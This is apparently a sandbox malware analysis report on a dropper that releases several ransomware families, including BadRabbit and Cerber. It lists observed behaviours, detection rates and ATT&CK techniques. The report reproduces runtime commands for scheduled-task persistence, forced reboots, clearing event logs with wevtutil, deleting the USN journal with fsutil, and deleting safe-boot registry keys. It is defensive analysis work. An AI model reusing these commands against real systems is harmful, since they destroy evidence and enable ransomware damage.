Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\5753.tmp	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\irH9zMhZub.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe	Code function: 1_2_01321499 SetUnhandledExceptionFilter,UnhandledExcep,GetCurrentProcess,TerminateProcess,	1_2_01321499
Source: C:\Windows\5753.tmp	Code function: 27_2_00007FF7CEF25540 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_00007FF7CEF25540
Source: C:\Windows\5753.tmp	Code function: 27_2_00007FF7CEF271F0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	27_2_00007FF7CEF271F0
Source: C:\Windows\5753.tmp	Code function: 27_2_00007FF7CEF257FC SetUnhandledExceptionFilter,	27_2_00007FF7CEF257FC

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 192.168.2.0 139	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 23.50.106.206 445	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 192.168.2.2 139	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 192.168.2.1 445	Jump to behavior

Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe "C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe"	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe "C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe"	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe "C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe"	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe "C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe"	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe "C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe"	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe "C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe"	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe "C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe"	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe "C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe"	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe "C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe"	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe "C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe"	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe "C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe"	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe "C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe"	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe "C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe"	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe "C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe"	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1446829312 && exit"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:08:00
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Setup
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl System
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Security
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Application
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN drogon

Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM explorer.exe
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM explorer.exe

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_007B841D GetCurrentProcessId,OpenProcess,OpenProcessToken,CloseHandle,DuplicateToken,AllocateAndInitializeSid,CheckTokenMembership,TerminateProcess,FreeSid,CloseHandle,CloseHandle,CloseHandle,

3_2_007B841D

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_007B6FFE GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,ConnectNamedPipe,PeekNamedPipe,Sleep,GetProcessHeap,HeapAlloc,ReadFile,StrChrW,GetProcessHeap,HeapFree,FlushFileBuffers,DisconnectNamedPipe,CloseHandle,

3_2_007B6FFE

Source: C:\Users\user\Desktop\irH9zMhZub.exe	Queries volume information: C:\Users\user\Desktop\irH9zMhZub.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation

Source: C:\Users\user\Desktop\irH9zMhZub.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

3_2_007B9534

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_007B57E5 LocalAlloc,GetSystemDefaultLCID,GetTimeZoneInformation,memcpy,NetWkstaGetInfo,memcpy,memcpy,NetApiBufferFree,LocalAlloc,memcpy,LocalFree,LocalFree,

3_2_007B57E5

Source: C:\Windows\SysWOW64\rundll32.exe

3_2_007B6FFE

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_007B1531 GetVersion,

3_2_007B1531

Lowering of HIPS / PFW / Operating System Security Settings

Uses netsh to modify the Windows network and firewall settings

Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe

Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall set allprofiles state on

Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe

Registry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WinDefend

Jump to behavior

Deletes keys which are related to windows safe boot (disables safe mode boot)

Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe

Registry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\WinDefend

Jump to behavior

Modifies the windows firewall

Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe

Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall set allprofiles state on

Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : select * from FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : select * from FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : select * from AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : select * from AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : select * from AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : select * from AntiVirusProduct

Source: Endermanch@Krotten.exe.0.dr	Binary or memory string: C:\WINDOWS\Cursors\avp.exe
Source: Endermanch@Krotten.exe.0.dr	Binary or memory string: Photo.exeC:\WINDOWS\Cursors\avp.exe
Source: Endermanch@Cerber5.exe, 00000013.00000003.395027648.0000000001794000.00000004.00000020.00020000.00000000.sdmp, Endermanch@Cerber5.exe, 00000013.00000002.419847472.0000000001794000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: es%\Windows Defender\MsMpeng.exe
Source: Endermanch@Cerber5.exe, 00000013.00000003.395027648.0000000001794000.00000004.00000020.00020000.00000000.sdmp, Endermanch@Cerber5.exe, 00000013.00000002.419847472.0000000001794000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match

File source: C:\Users\user\AppData\Local\Temp\Fantom.exe, type: DROPPED

Yara detected Mimikatz

Source: Yara match	File source: 27.0.5753.tmp.7ff7cef20000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.5753.tmp.7ff7cef20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.5753.tmp.7ff7cef20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.5753.tmp.7ff7cef20000.1.unpack, type: UNPACKEDPE

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match

File source: C:\Users\user\AppData\Local\Temp\Fantom.exe, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Valid Accounts	111 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	411 Disable or Modify Tools	1 Input Capture	2 System Time Discovery	1 Replication Through Removable Media	11 Archive Collected Data	Exfiltration Over Other Network Medium	2 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 Data Encrypted for Impact
1 Replication Through Removable Media	14 Native API	1 Valid Accounts	1 Valid Accounts	1 Deobfuscate/Decode Files or Information	LSASS Memory	11 Peripheral Device Discovery	Remote Desktop Protocol	1 Screen Capture	Exfiltration Over Bluetooth	21 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	1 System Shutdown/Reboot
Domain Accounts	1 Scheduled Task/Job	12 Windows Service	11 Access Token Manipulation	31 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Input Capture	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	2 Inhibit System Recovery
Local Accounts	12 Service Execution	1 Scheduled Task/Job	12 Windows Service	241 Software Packing	NTDS	28 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Non-Application Layer Protocol	SIM Card Swap		1 Defacement
Cloud Accounts	Cron	121 Registry Run Keys / Startup Folder	112 Process Injection	1 DLL Side-Loading	LSA Secrets	2 Network Share Discovery	SSH	Keylogging	Data Transfer Size Limits	3 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	1 Scheduled Task/Job	1 File Deletion	Cached Domain Credentials	151 Security Software Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	1 Proxy	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	121 Registry Run Keys / Startup Folder	121 Masquerading	DCSync	21 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Valid Accounts	Proc Filesystem	2 Process Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	21 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	11 Remote System Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	11 Access Token Manipulation	Network Sniffing	1 System Network Configuration Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	112 Process Injection	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	1 Rundll32	Keylogging	Local Groups	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery
Compromise Hardware Supply Chain	Visual Basic	Scheduled Task	Scheduled Task	2 Indicator Removal on Host	GUI Input Capture	Domain Groups	Exploitation of Remote Services	Email Collection	Commonly Used Port	Proxy			Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
irH9zMhZub.exe	67%	ReversingLabs	Win32.Ransomware.Cerber
irH9zMhZub.exe	64%	Virustotal		Browse
irH9zMhZub.exe	27%	Metadefender		Browse
irH9zMhZub.exe	100%	Avira	TR/Dropper.Gen
irH9zMhZub.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Endermanch@Krotten.exe	100%	Avira	TR/Sirery.A
C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	100%	Avira	HEUR/AGEN.1227089
C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exe	100%	Avira	TR/Ransom.pfnaw
C:\Windows\dispci.exe	100%	Avira	TR/Diskcoder.12354
C:\Users\user\AppData\Local\Temp\Endermanch@NoMoreRansom.exe	100%	Avira	HEUR/AGEN.1240493
C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe	100%	Avira	TR/BAS.Samca.fyzpg
C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	100%	Avira	TR/Genasom.wzara
C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe	100%	Avira	TR/Diskcoder.ezxim
C:\Users\user\AppData\Local\Temp\Fantom.exe	100%	Avira	TR/AD.HiddenTear.huakh
C:\Users\user\AppData\Local\Temp\Endermanch@Krotten.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exe	100%	Joe Sandbox ML
C:\Windows\dispci.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Endermanch@NoMoreRansom.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Fantom.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe	93%	ReversingLabs	Win32.Ransomware.BadRabbit
C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe	83%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe	86%	ReversingLabs	Win32.Ransomware.Genasom
C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe	78%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	91%	ReversingLabs	Win32.Ransomware.Cerber
C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	76%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	92%	ReversingLabs	Win32.Ransomware.Derialock
C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	69%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exe	85%	ReversingLabs	ByteCode-MSIL.Ransomware.Infinity
C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exe	60%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\Endermanch@Krotten.exe	96%	ReversingLabs	Win32.Trojan.Krotten
C:\Users\user\AppData\Local\Temp\Endermanch@Krotten.exe	86%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\Endermanch@NoMoreRansom.exe	91%	ReversingLabs	Win32.Ransomware.Troldesh
C:\Users\user\AppData\Local\Temp\Endermanch@NoMoreRansom.exe	72%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\Fantom.exe	88%	ReversingLabs	ByteCode-MSIL.Ransomware.Fantom
C:\Users\user\AppData\Local\Temp\Fantom.exe	66%	Metadefender		Browse
C:\Windows\cscc.dat	4%	ReversingLabs
C:\Windows\cscc.dat	0%	Metadefender		Browse
C:\Windows\dispci.exe	96%	ReversingLabs	Win32.Ransomware.BadRabbit
C:\Windows\dispci.exe	86%	Metadefender		Browse

Unpacked PE Files

Source	Detection	Scanner	Label	Download
32.2.Endermanch@BadRabbit.exe.1320000.1.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
1.0.Endermanch@BadRabbit.exe.1320000.3.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
40.2.Endermanch@Cerber5.exe.4df0000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
38.0.Endermanch@Birele.exe.400000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
49.0.Endermanch@BadRabbit.exe.1320000.3.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
4.0.Endermanch@BadRabbit.exe.1320000.3.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
40.0.Endermanch@Cerber5.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1227089	Download File
32.0.Endermanch@BadRabbit.exe.1320000.1.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
58.2.Endermanch@Cerber5.exe.4e10000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
10.0.Endermanch@BadRabbit.exe.1320000.2.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
1.0.Endermanch@BadRabbit.exe.1320000.0.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
49.0.Endermanch@BadRabbit.exe.1320000.0.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
55.0.Endermanch@Birele.exe.400000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
4.2.Endermanch@BadRabbit.exe.1320000.0.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
58.0.Endermanch@Cerber5.exe.400000.2.unpack	100%	Avira	HEUR/AGEN.1227089	Download File
19.0.Endermanch@Cerber5.exe.400000.2.unpack	100%	Avira	HEUR/AGEN.1227089	Download File
40.2.Endermanch@Cerber5.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
40.0.Endermanch@Cerber5.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1227089	Download File
14.0.Endermanch@Birele.exe.400000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
32.0.Endermanch@BadRabbit.exe.1320000.3.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
8.0.Endermanch@Birele.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
58.2.Endermanch@Cerber5.exe.4de0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.0.Endermanch@BadRabbit.exe.1320000.1.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
38.0.Endermanch@Birele.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
4.0.Endermanch@BadRabbit.exe.1320000.1.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
